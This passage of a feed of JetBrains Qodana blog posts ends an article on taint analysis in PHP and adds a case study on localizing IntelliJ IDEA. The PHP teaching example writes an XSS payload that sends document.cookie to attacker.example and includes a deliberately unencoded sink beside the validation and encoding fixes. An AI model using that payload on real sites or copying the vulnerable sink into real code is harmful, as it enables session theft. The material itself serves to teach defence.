&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--3EwxMS0O--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5ojno451lsmsjaw66f51.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--3EwxMS0O--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5ojno451lsmsjaw66f51.png" alt="Image description" width="880" height="575"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Marker 9: Tainted data contained inside the transmitted string will be located in the $out parameter.&lt;/p&gt;

&lt;p&gt;Marker 10: Data from the $out parameter is passed to the &lt;code&gt;print&lt;/code&gt; function without any sanitization. This function is a sink, and the unencoded output creates an exploitable XSS vulnerability.&lt;/p&gt;

&lt;p&gt;To exploit the vulnerability, an attacker who can write to the position file read at markers 1-2, or to whichever file $posFile points at (markers 3-4), can place HTML or JavaScript in it, and the unsanitized print function will emit it verbatim into the web page.&lt;/p&gt;

&lt;p&gt;Qodana will alert you to this vulnerability and give it a high priority so that you can resolve it as soon as possible and prevent the hack.  &lt;/p&gt;
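&lt;p&gt;The following added example pulls together the two remedies from the “What is taint analysis?” section (sanitize, validate) and the file-sourced flow traced above. It is not the analyzed project’s code: doUpdateSearchIndex, output, and the position file are reused from the markers, while the validation and encoding helpers, the temporary file, and the constructed payload are assumptions. A search index position is an integer, so validation at the source is the natural fix; for free text that must be displayed, the fix is HTML encoding at the sink for the context it is written into.&lt;/p&gt;

```php
&lt;?php
declare(strict_types=1);

// Added example, not the analyzed project's code. doUpdateSearchIndex, output and the
// position file mirror the flow traced above; every body and helper here is an assumption.

/** Sink: writes straight into the HTTP response (stands in for the print inside output()). */
function output(string $out): void
{
    print $out;
}

/** Vulnerable shape: the file contents reach the page inside concatenated markup, unencoded. */
function doUpdateSearchIndexVulnerable(string $start): string
{
    $out = "&lt;p&gt;Resuming index update at position " . $start . "&lt;/p&gt;\n";
    output($out);
    return $out;
}

/** Validate: a position is a non-negative integer, so anything else is rejected at the source. */
function readStartPosition(string $posFile): int
{
    $raw = trim((string) file_get_contents($posFile));
    $start = filter_var($raw, FILTER_VALIDATE_INT, ['options' =&gt; ['min_range' =&gt; 0]]);
    if ($start === false) {
        throw new UnexpectedValueException("Corrupt or tampered position file: $posFile");
    }
    return $start;   // an int cannot carry markup
}

/** Sanitize by output encoding: free text bound for an HTML element body is encoded for that context. */
function renderMessage(string $untrusted): string
{
    $out = "&lt;p&gt;" . htmlspecialchars($untrusted, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "&lt;/p&gt;\n";
    output($out);
    return $out;
}

// Constructed input: a position file whose contents an attacker managed to replace.
$posFile = tempnam(sys_get_temp_dir(), 'searchUpdate');
file_put_contents($posFile, "42&lt;script&gt;fetch('https://attacker.example/?c=' + document.cookie)&lt;/script&gt;");

$tainted = trim((string) file_get_contents($posFile));
doUpdateSearchIndexVulnerable($tainted);   // the script tag leaves the server verbatim
renderMessage($tainted);                   // same bytes, encoded: the browser shows text and runs nothing
try {
    readStartPosition($posFile);           // validation stops the value before it reaches any sink
} catch (UnexpectedValueException $e) {
    print $e-&gt;getMessage() . "\n";
}

file_put_contents($posFile, "42\n");
$start = readStartPosition($posFile);      // a genuine position passes
output("&lt;p&gt;Resuming index update at position $start&lt;/p&gt;\n");
unlink($posFile);
```

&lt;p&gt;For the &lt;code&gt;$email&lt;/code&gt; case above, the same validation step is &lt;code&gt;filter_var($email, FILTER_VALIDATE_EMAIL)&lt;/code&gt;, which returns false for anything that is not a syntactically valid address. Removing tags, for example with &lt;code&gt;strip_tags&lt;/code&gt;, leaves quotes and ampersands intact and does nothing for attribute or JavaScript contexts, which is why encoding for the output context is preferred over stripping.&lt;/p&gt;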

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Taint analysis helps eliminate exploitable paths from untrusted input to sensitive operations, so it’s an effective way to reduce the risk in your software. To learn about taint analysis and Qodana in detail, explore the Qodana documentation.&lt;/p&gt;

&lt;p&gt;Happy developing and keep your code healthy!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.jetbrains.com/qodana"&gt;GET STARTED WITH QODANA&lt;/a&gt;&lt;/p&gt;

</description>
      <category>codereview</category>
      <category>php</category>
      <category>security</category>
      <category>codequality</category>
    </item>
    <item>
      <title>Qodana and IntelliJ IDEA: How a Code Quality Platform Streamlined the Localization of an IDE</title>
      <dc:creator>Valerie Kuzmina</dc:creator>
      <pubDate>Mon, 23 Jan 2023 10:33:23 +0000</pubDate>
      <link>https://forem.com/qodana/qodana-and-intellij-idea-how-a-code-quality-platform-streamlined-the-localization-of-an-ide-2l2e</link>
      <guid>https://forem.com/qodana/qodana-and-intellij-idea-how-a-code-quality-platform-streamlined-the-localization-of-an-ide-2l2e</guid>
      <description>&lt;p&gt;Have you ever wondered how to make sure that your determination to live a healthier life, not sweat the small stuff, and work smarter, not harder continues past Valentine’s Day? Psychologists say that breaking big goals into small steps is the best way to stick to your New Year’s resolutions.&lt;/p&gt;

&lt;p&gt;This advice applies to programmers’ resolutions too. If you plan a large project that involves code refactoring, you may want to see the full picture of the required changes and plan accordingly. This is exactly what the IntelliJ team did when they needed to localize the IDE’s entire UI into Chinese, Japanese, and Korean.&lt;/p&gt;

&lt;p&gt;Using Qodana, the code quality platform from JetBrains, as a single source of truth for their localization process, the IntelliJ team managed to finish the project much faster than expected. This positive outcome was a result of wise planning, accountability, and oversight. Here’s how they did it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk2iwn8m25y4wwa1tar7t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk2iwn8m25y4wwa1tar7t.png" width="800" height="375"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.jetbrains.com/qodana" rel="noopener noreferrer"&gt;TRY QODANA FOR FREE&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The challenge: isolate 13,000 hard-coded strings and monitor progress effectively
&lt;/h3&gt;

&lt;p&gt;To streamline the localization of their UI into 3 different languages, the IntelliJ team needed to strip out all localizable items from the source code and put them into separate properties files to be handed over for translation.&lt;/p&gt;

&lt;p&gt;With over 13,000 strings, it was easy for some localizable ones to be overlooked, meaning that they remained in the code. When localizing the UI, hard-coded strings can be the most difficult parts to deal with. They are hard to find because they do not show up until the software has been localized. As a result, if a user installed the Japanese language pack, for example, some parts of the UI would still be in English.&lt;/p&gt;

&lt;p&gt;The team was therefore left with a lot of tedious and repetitive work. As a result, the head of the localization project was looking for a solution that would allow them to:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Automate a huge chunk of the work by continuously inspecting the code base for hard-coded string literals.&lt;/li&gt;
&lt;li&gt;Assign issues to the developers who would be responsible for fixing them.&lt;/li&gt;
&lt;li&gt;Oversee the extraction of localizable strings.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  The solution: automated code inspection for hard-coded string literals
&lt;/h3&gt;

&lt;p&gt;The localization project lead chose Qodana to streamline the code inspection process, resulting in a project with the following steps:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;#1. Connect Qodana to TeamCity&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The IntelliJ team connected Qodana to their &lt;a href="https://www.jetbrains.com/help/qodana/teamcity.html" rel="noopener noreferrer"&gt;TeamCity pipeline&lt;/a&gt; and enabled the &lt;a href="https://www.jetbrains.com/help/idea/hard-coded-string-literals.html" rel="noopener noreferrer"&gt;&lt;em&gt;Internationalization&lt;/em&gt; code inspection&lt;/a&gt; to highlight hard-coded string literals that were not extracted into properties files as required.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fabttc14cz7znn30zt33b.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fabttc14cz7znn30zt33b.png" width="800" height="267"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;#2. Configure the inspection profile&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;In the inspection profile, the team &lt;a href="https://www.jetbrains.com/help/qodana/qodana-yaml.html#Set+up+a+profile" rel="noopener noreferrer"&gt;configured the scope of the inspection&lt;/a&gt; to make sure that the platform skipped parts like legacy code, literals without alphabetic characters, and strings consisting of only whitespace.&lt;/p&gt;

&lt;p&gt;The team also made sure that TeamCity would produce a test report for each line inspected by Qodana and fail it if the string wasn’t extracted.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;#3. Decide on the frequency of scans&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Once fully configured, Qodana was set to inspect the code every 4 hours. It was especially important that the scan was running independently on the server, as opposed to on someone’s local machine. This ultimately saved the team valuable time.&lt;/p&gt;

&lt;p&gt;The first Qodana run resulted in 10,000 failed tests in TeamCity.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2F5xWCo4xt5mc1D8v5e_hbZ25hqF7-dI3Lwv4NytD00ddmXqd3unw39POav523WjOCCRiLCDKQq6cOS4RfcGgSFFqQ-X_0XCPA1yxVvRD5y6Dj9Qlu6UFUxhySnPZZqx-XtfJwanN7ginGIT4Tv-fuOWBXo0lBCFFTY4wq0UPBbcFkElIQ6n3klU0O4qM-5A" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2F5xWCo4xt5mc1D8v5e_hbZ25hqF7-dI3Lwv4NytD00ddmXqd3unw39POav523WjOCCRiLCDKQq6cOS4RfcGgSFFqQ-X_0XCPA1yxVvRD5y6Dj9Qlu6UFUxhySnPZZqx-XtfJwanN7ginGIT4Tv-fuOWBXo0lBCFFTY4wq0UPBbcFkElIQ6n3klU0O4qM-5A" width="1600" height="823"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Overview of the failed tests.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2FS-xGTPMyOu-zL-Ghz5Ndo8kQXVLSPvYXUYpyBIwNsfwtpRNLv2vlaN0FX-BiShb422gjiNYc0wFU3wPZcSceog4Ke7Ati8m-Jmx6_RWCbW7YAbtcEwg2dc2cem_mHfATcAo2DbLfQOz93meA9YFDmshdQKjQakys_vEHRpBLAUyHmufBBgqbJK7dkHPXnQ" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2FS-xGTPMyOu-zL-Ghz5Ndo8kQXVLSPvYXUYpyBIwNsfwtpRNLv2vlaN0FX-BiShb422gjiNYc0wFU3wPZcSceog4Ke7Ati8m-Jmx6_RWCbW7YAbtcEwg2dc2cem_mHfATcAo2DbLfQOz93meA9YFDmshdQKjQakys_vEHRpBLAUyHmufBBgqbJK7dkHPXnQ" width="1600" height="752"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Qodana flags the hard-coded string literal remaining in the code as an error in the internationalized environment.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;#4. Assign tasks&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;For each of the test failures, the project lead assigned a developer to investigate and extract the hard-coded string to the properties file.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2FRx5p2vnkFYKL3FEF4IttKzGgE_tnAPbLX9CmFaP20U1wXgN57ramrBJvRrkxQiGIagRx5ETZl7ztDO05l6No7HK4i8hr_crkAdohkw-I_QXSmMLi-wwLdQXelFG2b2lfQu-d2nnI0OmdYUyDxBjfhRoEi-zulqVEoDcc1YvPgCUPtNmm5U7mCUNMYrtOjQ" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2FRx5p2vnkFYKL3FEF4IttKzGgE_tnAPbLX9CmFaP20U1wXgN57ramrBJvRrkxQiGIagRx5ETZl7ztDO05l6No7HK4i8hr_crkAdohkw-I_QXSmMLi-wwLdQXelFG2b2lfQu-d2nnI0OmdYUyDxBjfhRoEi-zulqVEoDcc1YvPgCUPtNmm5U7mCUNMYrtOjQ" width="1600" height="619"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;How the assigned test is displayed in TeamCity.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;#5. Monitor the results&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;After each Qodana inspection, TeamCity compared the previous results to the current report. If the developer responsible for an issue extracted the string, TeamCity marked the test as fixed. This allowed the project lead to monitor the progress without having to manually mark tests as fixed.&lt;/p&gt;

&lt;p&gt;Additionally, the team was able to monitor progress in the Qodana Cloud dashboard, which updated information on the remaining code issues in real time and compared results between different Qodana runs.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff6wx2odp7i9bz2zfae94.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff6wx2odp7i9bz2zfae94.gif" width="760" height="408"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;The Qodana Cloud dashboard example.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Qodana also allowed adding selected issues to the baseline, otherwise known as the technical debt section. This way, the entire team could see the same list of issues and monitor progress right in the platform. Below is an example of how this works.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb9vuz5tmmxmj1hwtywxk.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb9vuz5tmmxmj1hwtywxk.gif" width="720" height="392"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;The Qodana baseline feature.&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The key outcomes
&lt;/h3&gt;

&lt;p&gt;In only a few months, the number of &lt;strong&gt;failed tests dropped from 10,000 to zero&lt;/strong&gt;, an average of about &lt;strong&gt;175 fixed tests per day&lt;/strong&gt;. The team successfully removed all hard-coded string literals from the source code and the whole UI was localized seamlessly, with no unexpected elements in English.&lt;/p&gt;

&lt;p&gt;With Qodana, the IntelliJ team required fewer manual steps in the localization process, thereby reducing the number of human errors and increasing confidence in the localized builds. Additionally, with checks running every 4 hours, they were able to detect issues sooner and prevent small problems from turning into big ones later on.&lt;/p&gt;

&lt;p&gt;Finally, Qodana became the single source of truth for the team lead, making it easy to ensure that developers fixed the problems they were assigned.&lt;/p&gt;

&lt;p&gt;Thanks to these results, the IntelliJ team will keep using Qodana as a code quality and resource planning platform when they deliver new functionalities or improve IntelliJ IDEA’s performance. More on that in our upcoming posts.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.jetbrains.com/qodana" rel="noopener noreferrer"&gt;GET STARTED WITH QODANA&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Happy developing and keep your code clean!&lt;/p&gt;

</description>
      <category>bestpractices</category>
      <category>codereview</category>
      <category>collaboration</category>
      <category>idea</category>
    </item>
  </channel>
</rss>
